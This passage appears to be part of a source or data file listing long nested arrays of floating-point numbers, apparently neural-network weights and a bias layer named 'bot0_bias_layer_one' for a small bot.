0.7036259175326771, 0.21596197931933148, 0.9005075337306461, 0.1619430222881133, 0.17511148583928704, 0.12412102274509018, 0.14819364686696435, 0.674482537859066, 0.5296306807918985, 0.6280226837469606, 0.333313771062695, 0.943895632544215, 0.7515780939370794, 0.9368937058229262, 0.838034305920252, 0.27266000684474545, 0.6581696559643396, 0.02681687575792613, 0.8526133898723627, 0.7280512349193168, 0.450647931108782, 0.8049190489553621, 0.092136959550428, 0.8301290649637031, 0.24556280744756498, 0.9444399644199132, 0.2712122323601268, 0.23372585660600143, 0.43653245985663847, 0.5260959114023122, 0.08609006450712153, 0.3370411119962493, 0.7606857773125798, 0.7536293616760558, 0.9471170093509075, 0.1550423858001132, 0.2014696023032787, 0.3523100191011582, 0.6761212839688128, 0.31605615873336357], [0.8589989151034176, 0.9205879354613992, 0.5658009831022578, 0.6624919987316232, 0.4273855607975894, 0.6849108761575583, 0.3489914338585597, 0.5000230584598159, 0.4552142895910096, 0.7534918604856007, 0.05273816335335835, 0.2473006331081593, 0.814860459181089, 0.9449911111256152, 0.3154138180498095, 0.9539155572552921, 0.7518347596817878, 0.023365572020625502, 0.8557164044965091, 0.16082140754698482, 0.06813227614290063, 0.46125814170282886, 0.44881604387101826, 0.8947508086034578, 0.7319526998975955, 0.6179698175613877, 0.1685177356520109, 0.7955290147474942, 0.34295626021024017, 0.7302703745820324, 0.6290390223575885, 0.3150038134608073, 0.15589918075822473, 0.7330207159661721, 0.2003986209482228, 0.24754860139623647, 0.4985017018119946, 0.7748825507470459, 0.7237826771364506, 0.7833863487188091, 0.12692856850179002, 0.2995745146131802, 0.1885682589859884, 0.21601997676786366, 0.4956055410235216, 0.4665425825557502, 0.5689866549801549, 0.4537637369826174, 0.6865286320773621, 0.8834640556612271, 0.9523324054321538, 0.3915992083161357, 0.7467938380784069, 0.028975034653854093, 0.028615476110396054, 0.4084924283224488, 0.3462202741713203, 0.6925465780736153, 0.7344262037045248, 0.5502151394031952, 0.37506091340248493, 0.2333521019597834, 0.15158581857376907, 0.6116255944188178, 0.35563056950051486, 0.028116045453378646, 0.6978961968420584, 0.339175472099702, 0.7078299546878752, 0.2301158217017839, 0.5372337967302829, 0.49813116607290453, 0.8743750556065111, 0.3169189865936647, 0.7180151044777112, 0.37800104622958963, 0.4376678102991368, 0.37431967128659227, 0.24172911674459252, 0.48529348810179496, 0.2895284185414577, 0.3794726383389032, 0.3768160754191633, 0.841996025660709, 0.19113799160208544, 0.23343123567923874, 0.3776082855417907, 0.693228116646905, 0.19818043710137934], [0.23442928790259254, 0.5270597398683236, 0.9434805575058122, 0.5183536391155518, 0.5225203572062653, 0.6303775221399587, 0.5710034547849748, 0.907250172587552, 0.48660604910115735, 0.8344378830300966, 0.5849143666263343, 0.9977636361888138, 0.6853981128782346, 0.023387737424950594, 0.8153129812128626, 0.8859341260575869, 0.46353854941422534, 0.9426018255212647, 0.17751878913452512, 0.6282171920417943, 0.6526018901557429, 0.7245822688329623, 0.3463983697012982, 0.36382161998442275, 0.007059603212630883, 0.7160621579791052, 0.3198660602195238, 0.09673339027606798, 0.058948450285090215, 0.4654432816415096, 0.18396626013159112, 0.35460661705655194, 0.4779687230862515, 0.08873213336421026, 0.31039181482779343, 0.8243197960672491, 0.7788657901338738, 0.5203322424391237, 0.16578876173631107, 0.010745951985762447, 0.2095169401470286, 0.08465991520628846, 0.7763756509042116, 0.7818553375093228, 0.4517786769989125, 0.8435066446008861, 0.5047500320263252, 0.6823487996504012, 0.32257139764610165, 0.25766419815084063, 0.35763845881218903, 0.19524691813616513, 0.6690296723598159, 0.8119236078290158, 0.25937986520576584, 0.5668127978721569, 0.020395613420555514, 0.5331479673310816, 0.2781821094486766, 0.007885819488966717, 0.49389016029641397, 0.6395695069820977, 0.5087845101809293, 0.8993590214919812, 0.7176105744308938, 0.7777230849334175, 0.10303890595706011, 0.47083379224363076, 0.7455708640875002, 0.9864302849355893, 0.8443083342610728, 0.3932019777964323, 0.4851928575497402, 0.7668609919871915, 0.4996680932413734, 0.9567544994329235, 0.9580092619655727, 0.533813121745682, 0.22834630304698467, 0.505787431940156, 0.2993566372691855, 0.9094325127352475, 0.35519131276227245, 0.6516850554465219, 0.5348025073958135, 0.9010752275141855, 0.679590533146081, 0.6367129651722034, 0.3668922071224945], [0.6146764631187207, 0.8874186699171863, 0.8480399462325803, 0.20068766571497343, 0.20603462218590085, 0.7309106523058968, 0.7772921369986033, 0.11884218095788357, 0.4527952507109386, 0.8961245088401995, 0.4375461972499237, 0.9223645337288969, 0.5431079905378599, 0.3285898223343817, 0.41198341474158995, 0.1869340227090217, 0.25924361450262545, 0.1495219898575212, 0.2955139185493081, 0.9709498967366177, 0.45587515354253716, 0.5394637859629227, 0.20809095312967285, 0.3541174358473107, 0.12923438789431807, 0.28466121709499537, 0.4967473951829994, 0.39509479173112705, 0.30284538900951485, 0.5901314499471326, 0.951368281442547, 0.23913347604564927, 0.6382409390415342, 0.19604053086960427, 0.8043270927195658, 0.08926621675440516, 0.05908536651251228, 0.8656843554709941, 0.7637852854395647, 0.1526020845461602, 0.9804321908771156, 0.8932775996756526, 0.27710630733065467, 0.37487489227224857, 0.43330384227405694, 0.6780435928577319, 0.506874593284314, 0.703497188797841, 0.7981115280292056, 0.051908650116415433, 0.5170954091689609, 0.9634992418020359, 0.739939894346959, 0.2441148481659301, 0.6670235050087763, 0.11547114852680518, 0.8190056486576314, 0.7945736218468291, 0.8693898033925881, 0.502171190426245, 0.6715989550923769, 0.16868171654382724, 0.137538473865627, 0.97258428461369, 0.7817040672800186, 0.4039959100288911, 0.47468662396613714, 0.5515266017001743, 0.9360993415595585, 0.20174775607815687, 0.0252636844437234, 0.3364988436025218, 0.4786986166033752, 0.11748549112563955, 0.28959189806225005, 0.7789706367803032, 0.0264151165830373, 0.7550596849301799, 0.26105600674610596, 0.8518137455711262, 0.12299509668829278, 0.4201812831429419, 0.3636918364332651, 0.3682138525449974, 0.06524426363622382, 0.6856822448052643, 0.7989409412337833, 0.7549553668407292, 0.34647289103998147], [0.6706394858686713, 0.21536097843621504, 0.3362709140715564, 0.6277614685838748, 0.14957815515240924, 0.07333258633236084, 0.09402794245542334, 0.7227322252688757, 0.1880275202623135, 0.583819827252326, 0.10072831267463689, 0.18770248873981676, 0.37607826401924627, 0.0023000646831671245, 0.44511082245634925, 0.4785569216883714, 0.9071936790935713, 0.6454786722056004, 0.9392748677234959, 0.7542278049775587, 0.7867061744003581, 0.9045141477092087, 0.4714758591930932, 0.7012148063559211, 0.467267836520909, 0.9457330968871313, 0.34471107732905126, 0.8522985865827729, 0.5612620546888427, 0.45030705350553313, 0.33781162988558155, 0.17829832710486015, 0.1298566608511743, 0.8239385711903983, 0.7361287020038201, 0.9880481773193808, 0.4916383814642198, 0.8813580378810841, 0.9447471903452505, 0.6796387066107975, 0.4435912646105554, 0.5469001847925956, 0.03845347628397022, 0.5561703545854974, 0.6786295123760606, 0.43944198678490165, 0.1056381702465764, 0.6666617282366329, 0.22106204476832614, 0.046301758313022634, 0.6308544238663649, 0.3824368965643292, 0.5206526562545688, 0.646420017882177, 0.9458896924706756, 0.9223731376962395, 0.7345294924096443, 0.6737843563558115, 0.15241341957827825, 0.4794788721548985, 0.3617093383564023, 0.2550688503141948, 0.12011578847553672, 0.4412933510597261, 0.76841154415333, 0.9956780068633927, 0.1326959140522408, 0.13815667885219474, 0.06564470780785481, 0.3339272573705976, 0.8648954481919148, 0.04706612680477462, 0.8838221244912521, 0.5140758865888385, 0.31982805440913775, 0.5617243562322743, 0.5237296824398704, 0.5152836045737891, 0.012164862079879435, 0.2477154434373664, 0.8987388992828378, 0.019634381008508228, 0.830604581800841, 0.31552045364671577, 0.5224802707463108, 0.08158240537656425, 0.8041713539528017, 0.4632973577346924, 0.3582620104868999], [0.019768651523478176, 0.13646752686882724, 0.624226760843699, 0.01277193590948511, 0.7865783839820537, 0.7782480324485477, 0.2264608943768619, 0.9358522646734189, 0.8260098439228931, 0.006358023917044431, 0.576940915708134, 0.004867642435655961, 0.9226454595896103, 0.27941040316055454, 0.23761013168357703, 0.3188915758200127, 0.45320424629285017, 0.5559603672959241, 0.6467478169671853, 0.9830783745865121, 0.2995917597455343, 0.5340750103709117, 0.39075193232478955, 0.5710644739483935, 0.20521640107631922, 0.22196544176888167, 0.025026912433993576, 0.49200280508282446, 0.34413423903544027, 0.4883931533679793, 0.8649831349519096, 0.7237706303952507, 0.11047105003416169, 0.004307855402999494, 0.09762072710078618, 0.9987793983957689, 0.5972217315605155, 0.5399865795898457, 0.22051229829384822, 0.4042972066427978, 0.2793049581226288, 0.349461756019788, 0.8160003492535447, 0.2878821608324085, 0.12927551204552956, 0.3483199181672765, 0.3983776425979748, 0.6231150868300447, 0.6098483864641812, 0.44556518959307423, 0.8574955168192807, 0.930800274710943, 0.0007219689438567878, 0.9065122731406643, 0.4717071746417064, 0.568854857803993, 0.3663807406345614, 0.12609199711169072, 0.6981098431745754, 0.8190615538203477, 0.13201859430723462, 0.1665770665836135, 0.6074176602872432, 0.3940990337640905, 0.5160342256697236, 0.48135062991417976, 0.8960930609479207, 0.08080500609633523, 0.9363236673599779, 0.9511957414680445, 0.9326295663424289, 0.15669687090253503, 0.27193678357839, 0.8761662355539462, 0.9844672256241132, 0.6493263111065298, 0.2500222320789941, 0.4099021688883858, 0.2348348882071749, 0.6961870465014702, 0.046085016815851754, 0.7263638891996921, 0.4898704941174563, 0.8574950055516111, 0.61822108259464, 0.13397655904972983, 0.27643561993076526, 0.7765709860656006, 0.3577565098835176], [0.3877558711623732, 0.7514317697573002, 0.9639131645470678, 0.8024671643811127, 0.6298390753848633, 0.9705463669304571, 0.8688709898376573, 0.5576195343086124, 0.47289473833667695, 0.42080357048297046, 0.10660218436340163, 0.07268544732542215, 0.5776233958122731, 0.5715345910190736, 0.3349591716707053, 0.35179616218216336, 0.055642942607390555, 0.5237309328682912, 0.5834035551189168, 0.0120711148084367, 0.12139805843695828, 0.024347112180418518, 0.025066251719856325, 0.4058602952128988, 0.13937114619292013, 0.5356302668775775, 0.055564249210826255, 0.08750845529464824, 0.4853336637108244, 0.05121321882521912, 0.8966818660578904, 0.6768806220837467, 0.04810095133283687, 0.867614556127244, 0.09155699582721466, 0.10235884606418122, 0.33824440039236103, 0.9676928002897016, 0.7227114937163324, 0.7302318836349606, 0.15536979072802082, 0.5416532978056188, 0.25831909401439557, 0.09996117855766529, 0.24397532062560645, 0.6661360393612957, 0.31966822209067813, 0.36409092713437585, 0.8404308768988108, 0.3264147405356487, 0.857787140397851, 0.22399287855036742, 0.8795672339416911, 0.6091569141080034, 0.7814608244464497, 0.14884883658408943, 0.059355291180693825, 0.9853013617617176, 0.4180918364320487, 0.11754944308938031, 0.8374597061482904, 0.41905505520237474, 0.476556659637583, 0.5118784003234753, 0.19379649065943416, 0.4249398248670314, 0.1537670225974811, 0.9268919992695379, 0.1579910482588972, 0.045138784342388716, 0.2624515531610213, 0.613333383713903, 0.5315883910690812, 0.40103947827118847, 0.5483874352804707, 0.027416075466329848, 0.9645060589940326, 0.9314545595353739, 0.9870935578479648, 0.8794611366618618, 0.5327256179466184, 0.274324846075351, 0.699660319626102, 0.7127877832123768, 0.8383954082605681, 0.40139055024798853, 0.7982610909401241, 0.9335778894232203, 0.5925332240644265], [0.021683831816291188, 0.14488576098185857, 0.21581430134213486, 0.5224732115844597, 0.8733945410912698, 0.028601972015279142, 0.748741214792977, 0.47737184971585966, 0.17644634547173854, 0.4512237509370336, 0.16425979040066252, 0.23187158913205552, 0.18090034444339342, 0.09165921542264033, 0.21878426996200007, 0.002856701807605666, 0.1282553522580966, 0.8583691404511318, 0.6925397387711056, 0.7698111993603299, 0.23077858973452514, 0.1255886239999574, 0.007266624245474085, 0.23560898137212738, 0.1565429079150621, 0.7244613528597448, 0.002391080232125309, 0.04094849196938388, 0.7095353333608214, 0.7150812512736034, 0.6583027000160333, 0.9508581586118067, 0.3880525006540718, 0.06472818704510974, 0.23356147783785486, 0.03538544344772554, 0.34849195576776815, 0.3554699415849225, 0.281251181426851, 0.5134825842711026, 0.7569949380930084, 0.3980926264957686, 0.2414189283423238, 0.5134297485626299, 0.6367448961740705, 0.5667642316074323, 0.03734018769313996, 0.07666504007322739, 0.05001987044731093, 0.8161346215440309, 0.15386077919613905, 0.49144045701513284, 0.5978665992610493, 0.4898606145816846, 0.838502456916722, 0.16454081569839352, 0.8315748915823, 0.9461322870069585, 0.559029556481941, 0.3630411546975646, 0.9197000038933355, 0.9578713894970698, 0.7796660059057713, 0.6790974334618478, 0.7798765983652948, 0.6341299081393088, 0.8228813667963089, 0.40882455970181253, 0.3700460828155965, 0.3396086498957802, 0.4272359504764638, 0.8316485499074643, 0.7149340435888372, 0.23435158493138564, 0.18145637578631924, 0.2991343036323173, 0.3287171228023349, 0.5908230498000631, 0.9349960434593065, 0.5047193806099111, 0.05599637594835183, 0.8136863960784595, 0.9121179910469155, 0.8716972472570678, 0.5567000492102149, 0.5331970622184067, 0.6661054742771336, 0.8904604192185753, 0.8488459005257593], [0.8094654443180049, 0.7126221192764005, 0.8492874761262287, 0.6086407551780497, 0.5073299864992369, 0.8418344703277797, 0.3955750532343434, 0.08043826174319835, 0.5201155575513061, 0.7680964080024046, 0.1590478725554778, 0.673376261328889, 0.24810683507827525, 0.6842500565858487, 0.09307498532360248, 0.41062276958029387, 0.14583526681193515, 0.6557518632502922, 0.39009479598731067, 0.2858720440835312, 0.4959462405579389, 0.05815166340000477, 0.953983992874577, 0.393375787046373, 0.7554181634027353, 0.3855639201577248, 0.17845506733749916, 0.9143448353414838, 0.559690496178368, 0.16104193570813174, 0.30884768387002726, 0.46060951897516356, 0.6162857545341939, 0.9902777531887186, 0.8003585506953921, 0.3593783470110249, 0.4120891177906931, 0.35729597465414753, 0.5901215186750373, 0.5353859647656665, 0.9030751757111752, 0.3908047656533499, 0.5735339313610855, 0.3304858627329724, 0.18228334089114606, 0.37411988212761105, 0.5030541153968817, 0.7077561071339472, 0.732368452791827, 0.9828364177630692, 0.7710382196881208, 0.4552134945630685, 0.8951881030912309, 0.9174380893314233, 0.23715023606752994, 0.560930107736667, 0.13486935715836412, 0.6385540058900997, 0.6927273952042767, 0.5713560728494848, 0.37971086771524176, 0.41838381460239027, 0.13340278163428898, 0.5749005057987757, 0.5197260705922356, 0.5681836436460878, 0.21945456218732529, 0.6332736122557842, 0.6349144158837433, 0.22659743665592968, 0.06036296466184987, 0.659188644559147, 0.49090939491332397, 0.2937355982215004, 0.5612569722644188, 0.7742712475182901, 0.8679729273619209, 0.006798297028660749, 0.9453131845389968, 0.5368060633065133, 0.10613348111308119, 0.04333798658524668, 0.7719685442142566, 0.20773787244375752, 0.6535821187878572, 0.436440304294318, 0.4823248347138438, 0.16191798792588707, 0.8222854580145592], [0.8944250872640708, 0.29410006490801255, 0.021281104376699056, 0.43626256598440216, 0.678889294211373, 0.6846235743152399, 0.8500898345739031, 0.2564785512343001, 0.4795711368772311, 0.08047766770950615, 0.4322903032873354, 0.1552745862966336, 0.651565534862407, 0.8827509983504254, 0.0500267151125251, 0.5944113477842224, 0.645669035508245, 0.2302252986362079, 0.8223340303247375, 0.40528478093733367, 0.742959385611033, 0.3767227708600003, 0.6633986658873644, 0.6664617914386145, 0.8269366398826932, 0.3831793282341889, 0.3571089225183812, 0.27186925593914135, 0.731023580017055, 0.4960883362506734, 0.04669599765142862, 0.8848306297121878, 0.6515670338000039, 0.116372337442331, 0.9639756355041745, 0.11945969073036011, 0.2429551344188905, 0.27444445573970233, 0.9972964660339627, 0.31781829176369647, 0.49842000802660036, 0.7372446788278552, 0.6854237841654834, 0.11908645913206661, 0.4573478579741873, 0.7803908691555322, 0.5678390137249681, 0.3694568752029608, 0.5222815922149208, 0.9288767746857569, 0.7716530440989949, 0.708033113555788, 0.35316916068978865, 0.010410329175307376, 0.49767889734298, 0.4186993982986841, 0.009111452227861694, 0.544419247273247, 0.11793570921496299, 0.1071295634664623, 0.1594632357434267, 0.5821295748405844, 0.5471630312578853, 0.4274556540978818, 0.24366110456762957, 0.8885447739344826, 0.9002765195027855, 0.5153960281394975, 0.6956344704805418, 0.8739138303084868, 0.9783401893773406, 0.7663604272925063, 0.8523114635283452, 0.6656713216249854, 0.263011627864145, 0.3418285808283087, 0.6222640632883855, 0.17588879350008824, 0.7074174514593475, 0.1383476711936208, 0.343397165260687, 0.5337209213435162, 0.8666697336406812, 0.9053982628909958, 0.5345698046742966, 0.16128619406089095, 0.29333311314695754, 0.8111802673342079, 0.8226152422043591], [0.4748154032190588, 0.7132328767581909, 0.9350233720609189, 0.14522107693951036, 0.5886830895075489, 0.26451172786239807, 0.5724788060533498, 0.9555302263723741, 0.13061134069585, 0.8767847188372502, 0.425164830082733, 0.3751336852356594, 0.860403793839953, 0.7177714779145767, 0.6037121952293699, 0.5498851468587806, 0.38153089584125244, 0.143012932709922, 0.3530744133590742, 0.33460456308139463, 0.008725593823312505, 0.23912519679148225, 0.9801241126467083, 0.5916319940126042, 0.7623087170403247, 0.5139442591478972, 0.2637214284172503, 0.3598556958588859, 0.7444059806797191, 0.43959176545941714, 0.6431058680074182, 0.4373689334951909, 0.31443359958676054, 0.731144640933631, 0.32948224756333, 0.6171222632213961, 0.558226300119688, 0.9336350733105409, 0.14253457336301578, 0.4123422687348003, 0.8559003007930053, 0.15842130263734178, 0.1658482990946052, 0.3604101296699225, 0.4144231898697739, 0.3049920664908867, 0.6837401498214734, 0.0019355819087153447, 0.4970660332693665, 0.05470462449839342, 0.22515242952765868, 0.669414349696509, 0.33108539884303956, 0.6331240173083867, 0.6068238548433896, 0.8924971738430305, 0.8217298844826574, 0.057050958933789864, 0.7153892206370338, 0.6843647359403814, 0.39987649053907104, 0.213409668313837, 0.9341856514785741, 0.5281779979515115, 0.3998621637401665, 0.6667483136461329, 0.9580038109531581, 0.80349421290491, 0.2881646376654581, 0.8148237381518537, 0.26170270060234047, 0.9044898527318312, 0.9431482616833392, 0.4693570884536783, 0.5602840155014872, 0.9932304764326271, 0.10474887800745669, 0.9914574200058177, 0.9496555245689886, 0.24138005914454252, 0.6316717058047135, 0.5018214361170384, 0.3631803258580686, 0.4031369744535125, 0.634235073765228, 0.45741494312640685, 0.7332676537209483, 0.6438408032024437, 0.5888913283483819], [0.8470074522976069, 0.7991264080752158, 0.7054017630336866, 0.5390090326859425, 0.450465167607737, 0.3784014837211357, 0.43906617255527636, 0.5382033296939857, 0.41709011272003194, 0.9622215152186111, 0.004826870852161935, 0.48099808898356766, 0.9580890767452148, 0.24218703744264736, 0.5984272656016865, 0.44785476783833555, 0.4074464470414978, 0.19693799207532792, 0.8211041423007959, 0.7402136575970782, 0.6213825378119736, 0.4659960514414494, 0.23225868661130522, 0.11349114152810791, 0.006586934558613811, 0.9727037036427693, 0.01636821222990903, 0.30568804002543815, 0.06234803349423057, 0.02462675388524982, 0.5524077424419055, 0.4959917442037728, 0.11128826784816759, 0.715144362562659, 0.7070284031668713, 0.7966463089461793, 0.48096677918930053, 0.8941347405721319, 0.8432163553208017, 0.5615533840005362, 0.22665842285607585, 0.037104922651475025, 0.9138867435801261, 0.8561119638579906, 0.5494691116938325, 0.19406402907710174, 0.6719155853899615, 0.5127510720128718, 0.37648111518915084, 0.3450085757756177, 0.4047963648470676, 0.7731065260663806, 0.40247733608775127, 0.6320001006626622, 0.929103337919123, 0.20897774571818706, 0.6456178100625248, 0.3232174767485603, 0.39687723430284727, 0.6837676991655747, 0.9345201681779461, 0.8540335834976479, 0.19217662203438413, 0.97150310745832, 0.040995145368685315, 0.28069456425848305, 0.513765185721843, 0.55124817227775, 0.9544310124882137, 0.32038507125016, 0.30805047380723516, 0.16508064704198966, 0.1196184856851562, 0.7564186637807576, 0.11966010631532775, 0.019002124010142563, 0.7076068623880641, 0.0974782107836849, 0.7800016402087805, 0.41250566101954655, 0.7799420911959508, 0.1818916649831943, 0.37192964309947973, 0.9243063402456012, 0.1287851621740388, 0.5500385718038697, 0.30175860293705004, 0.41055516719019614, 0.6510592645884327]] bot0_bias_layer_one = [[0.3275250452843903, 0.7271768872295724, 0.26733345914303186, 0.04655575331455497, 0.32441220478337585, 0.34093175254025665, 0.7204448841942656, 0.42932121883413155, 0.7153779086439199, 0.41982018793567855, 0.7377382844745212, 0.929127131636791, 0.21832558208042752, 0.8076943811660312, 0.5275243415704276, 0.1802380624329032, 0.43663439839853524, 0.27976383158667784, 0.06775882255149179, 0.8946371742914273, 0.9701000305332398, 0.41770274517935424, 0.7414883094709883, 0.1808867389892035, 0.11892117235753419, 0.07021886542073863, 0.8813487933305021, 0.09092394870482001, 0.42328386654001326, 0.04913770243015836, 0.5982059628144897, 0.13684314640280637, 0.007119165524731796, 0.540119799371301, 0.7509253306756501, 0.2393909580818474, 0.7386822169253867, 0.843654812434101, 0.4520311393653502, 0.6794181773236585], [0.4881133809378714, 0.10777264408186005, 0.9649031152777867, 0.8971404243740327, 0.9791559939761721, 0.22600218290341156, 0.3680533482346594, 0.29364808141683896, 0.5288687136215953, 0.844291203177785, 0.6340280656610756, 0.8289974344443232, 0.8027613900965463, 0.02835748739388788, 0.5220327561094988, 0.16139088129245138, 0.2184091343908472, 0.5424805089296867, 0.3150837786499503, 0.7872032244292628, 0.7277964989717531, 0.47163838818371606, 0.3215782366182486, 0.0949802539926542, 0.008646123139260165, 0.13171277790409097, 0.649551197829059, 0.9287596442801, 0.15517594735210272, 0.494496112455005, 0.9897914500353218, 0.12245060529239082, 0.9167487808038438, 0.7326485760224891, 0.46756089945320567, 0.11468111423896377, 0.5815875236396542, 0.49562310735741455, 0.1306418415977345, 0.641441556537048], [0.05570114597521625, 0.5980682772186662, 0.5441246868126837, 0.9629527286232146, 0.17001126854380955, 0.33295685449001833, 0.037001026122059355, 0.07189278334431581, 0.5590840825278397, 0.8071695030419245, 0.4958432132369447, 0.683723739256462, 0.7491849427583817, 0.299105533340016, 0.46939559065384384, 0.4772550496590239, 0.0644737196159374, 0.35445272311069564, 0.455552771342173, 0.10683560071445064, 0.6568633518154414, 0.4162432940305818, 0.28751873650613535, 0.16500796205753243, 0.4200772541477126, 0.8760846671552152, 0.3974844265589761, 0.7217229805551113, 0.13994187661109447, 0.7215628567846941, 0.8085029311310585, 0.4089690012346595, 0.35894753080647923, 0.6686907691593539, 0.747088706940398, 0.8934254992595548, 0.4576912586571059, 0.12538316845117725, 0.33154960526436184, 0.9714917437256508], [0.8737476639487803, 0.6605126879745623, 0.3735793825025385, 0.45243933930684443, 0.9177466800237971, 0.8995731050194395, 0.3336984685413138, 0.7232186842858778, 0.6860529374769745, 0.37072560843710234, 0.5964815484533584, 0.7190395851329352, 0.5061700938765509, 0.300293748249041, 0.45818698598501373, 0.9996857301675988, 0.9371884518350153, 0.03392005571054346, 0.8117761159828467, 0.4618958641315247, 0.1229414594949737, 0.8480107297950585, 0.6475743833480739, 0.7665054600229256, 0.17421310427690273, 0.3205317783426631, 0.5942511234242914, 0.9840273579982679, 0.10411345450085907, 0.010807155882615604, 0.44803547504160157, 0.6785995169810036, 0.8458894258092495, 0.3550638683994508, 0.49706016499337546, 0.9582307662833117, 0.4122231136881218, 0.12045148849358045, 0.1452784553630041, 0.1858442025184689], [0.9394060704000887, 0.11638838269039453, 0.1704815307003822, 0.8903849397366136, 0.8314182302189629, 0.3262040938033697, 0.34611836218089453, 0.640107029175983, 0.8893459840320047, 0.9928455275711988, 0.7257278106403986, 0.3559389019617173, 0.6922772853188367, 0.6409801505895948, 0.6717073188590976, 0.06959726723739768, 0.7633512391610467, 0.72145449079917, 0.8312999652703744, 0.611156968098582, 0.344951546571706, 0.9956727466779229, 0.3709186923958435, 0.6298485231034381, 0.9345331514243989, 0.57316951506192, 0.03736450587337059, 0.6252592879370199, 0.5042449232815995, 0.5233872291860681, 0.1300551994216409, 0.48456766803075557, 0.5244408576394232, 0.15510287148485968, 0.42423303531734846, 0.45645616070174144, 0.06420812492753536, 0.4814945265724957, 0.20812587681905848, 0.3759048960572262], [0.34807102160231906, 0.5355327172669765, 0.19168190868425916, 0.47177396811323546, 0.6615847976001273, 0.34409464494273245, 0.4160882467243431, 0.03535367928156019, 0.8825642927202796, 0.3101508209974875, 0.9681172325543592, 0.4222062853828412, 0.9770810593430425, 0.43537863668202037, 0.30116380434493273, 0.42275975603265736, 0.8171920212147155, 0.45163167104187985, 0.6987685175013633, 0.28539123139415445, 0.2270279947130487, 0.7976994456894502, 0.8638578167665035, 0.5320829879594836, 0.3691019189255792, 0.4197196251479812, 0.5108444056353197, 0.9075009090508516, 0.3603396815555171, 0.8010757658466784, 0.6205371636605198, 0.5616712591356063, 0.9542055487181537, 0.7795802715875466, 0.5210241017193381, 0.44832781154131185, 0.9430326719099386, 0.33235809736027677, 0.537439351777638, 0.1288547623371371], [0.8376949494187801, 0.7580734421395021, 0.9526013374313822, 0.7836704240242633, 0.031082529565398143, 0.2931197214925687, 0.46274212227611833, 0.4400042706575237, 0.3568418807714908, 0.8725862875784771, 0.026573131609544998, 0.33091411006036375, 0.8685101001420565, 0.9664726263667349, 0.5930075727075903, 0.3977425070753592, 0.4791933234489828, 0.5122529721944253, 0.4949986243179548, 0.32115761066204884, 0.2571719990710837, 0.5123352164735432, 0.711426477915039, 0.35273218987925437, 0.3981382639549541, 0.7569078695688047, 0.6714335862905793, 0.03618048220417924, 0.1418638448562517, 0.3907079011279989, 0.7635496022914924, 0.9971060327623831, 0.008238070336776815, 0.7721592756209594, 0.4325170522087902, 0.02031528355930101, 0.9658634084094332, 0.9922410528362061, 0.2657345041103858, 0.3847680513082925], [0.34306121640021436, 0.9273606777947256, 0.40213409723119065, 0.14521112307314665, 0.7696258323337549, 0.8558667880947536, 0.38795891819793893, 0.17730219291851823, 0.7644658387638474, 0.08122125881992415, 0.018147861241531782, 0.7276860927583733, 0.3764004985275261, 0.8016696987298413, 0.5061804880075447, 0.426507859082467, 0.011548753586314464, 0.8072779882953259, 0.630742825149668, 0.06778469936341869, 0.16728965800956497, 0.4797185163542439, 0.41525595280086836, 0.2709240521172047, 0.49352184286398737, 0.5063342147122715, 0.7658777404194702, 0.5515549354134741, 0.2669430898450168, 0.3437272962191662, 0.14318465947425096, 0.7304860416094893, 0.3955720080295869, 0.6324084524514856, 0.6378431611886639, 0.549195236855488, 0.9013672679098493, 0.4289686119376076, 0.7935877417257685, 0.48338085890749916], [0.5900179562537882, 0.5432954879073737, 0.19640623523574607, 0.7881818327512562, 0.15732189920206407, 0.3353849929960817, 0.7384397042908466, 0.3221335400194828, 0.9763041654344029, 0.7980606266575141, 0.8761164405235258, 0.9669580868181424, 0.31089410046909505, 0.12566953268870495, 0.7102408780354199, 0.23099740060044072, 0.9821065158526899, 0.22411722864278794, 0.9635844096852307, 0.6898131781523889, 0.07258072793484638, 0.8269677255512315, 0.08163965343762614, 0.09280739757981216, 0.6450205529429975, 0.03638220310426021, 0.7356865135167816, 0.06935094137150988, 0.6158372033572865, 0.3145841331792576, 0.9650802359425223, 0.09070756102677846, 0.19636328448638252, 0.747195485607386, 0.031869975064772516, 0.2131148991898587, 0.32567975093071355, 0.5015945859210379, 0.15200049780131453, 0.031101554637993245], [0.48386588787010354, 0.020264020039504782, 0.28850632614823646, 0.587757575580333, 0.855264066806549, 0.64773803876861, 0.8105920837614101, 0.23775074349020697, 0.3496258633885537, 0.7883419646313323, 0.28507336729645205, 0.07020765628740588, 0.261116933633854, 0.6029108731086765, 0.36096827371720985, 0.16162601030927404, 0.685181689441054, 0.04661628825550512, 0.07507679703724879, 0.2118689958998612, 0.2995129557690869, 0.7719621393992528, 0.5655002393494905, 0.5916212148799416, 0.8749509765668718, 0.749851647032304, 0.9213862869703966, 0.33942557129405515, 0.1444520104257332, 0.7742836702506523, 0.24634018053031304, 0.7044135128399076, 0.694242467073177, 0.4056309971260881, 0.2800779498211283, 0.2731365990024365, 0.5320224450576143, 0.036272977785647864, 0.5281527984096706, 0.6293194207765768], [0.6629150092034527, 0.9481177551802781, 0.6818026052797772, 0.28927977324053356, 0.9135973811037419, 0.9172420638192753, 0.9886101492124977, 0.06590020053191736, 0.2815659959581235, 0.866533254142697, 0.14925671526010675, 0.021882779499367566, 0.5217970771112279, 0.48693639984560444, 0.7542367031155869, 0.7145688295552209, 0.02935416994811202, 0.7465044329762184, 0.2432051676956788, 0.7516127604872034, 0.749319275628188, 0.9611595836871689, 0.2822778152432158, 0.9625092885556016, 0.27763604412954823, 0.4167474941209214, 0.20686938552939216, 0.6455401383047649, 0.6519187009365798, 0.5891287739783926, 0.6112597877688295, 0.1729925992017335, 0.805419613153654, 0.8788489148582148, 0.653468190130464, 0.6395370426899409, 0.3973476970782298, 0.5956976025828992, 0.14246867111614192, 0.15644201885670295], [0.08259373732863662, 0.4560504736040265, 0.2883114795256645, 0.3660525468265249, 0.22242704444276595, 0.8473650007000707, 0.22265397908453854, 0.6869118392843987, 0.4952519724429819, 0.39449286793938976, 0.6340153864258178, 0.5694563594587663, 0.48146323843778005, 0.2605930836672725, 0.5551468466344327, 0.04148406674186411, 0.3564135792777049, 0.655996613024885, 0.8029575089055511, 0.5825438615005202, 0.4048914623222183, 0.06292094996223896, 0.04386840172706685, 0.4148553366035186, 0.7596478191432033, 0.07251220625272725, 0.21022708348100572, 0.059143646216438306, 0.8334201928855044, 0.08981559327034216, 0.11136242392543094, 0.6057893994041005, 0.13011545988146056, 0.9198978622381345, 0.1173709559842443, 0.1229570041270398, 0.9894977060314595, 0.12063228955341909, 0.86662603381891, 0.127111398134356], [0.7582678129338829, 0.2741467456884237, 0.9205894818829418, 0.8970273957965978, 0.8640177045119971, 0.9004054014020741, 0.0632426870058923, 0.7068058690580731, 0.08325398085315139, 0.18545933638378442, 0.9219625887078976, 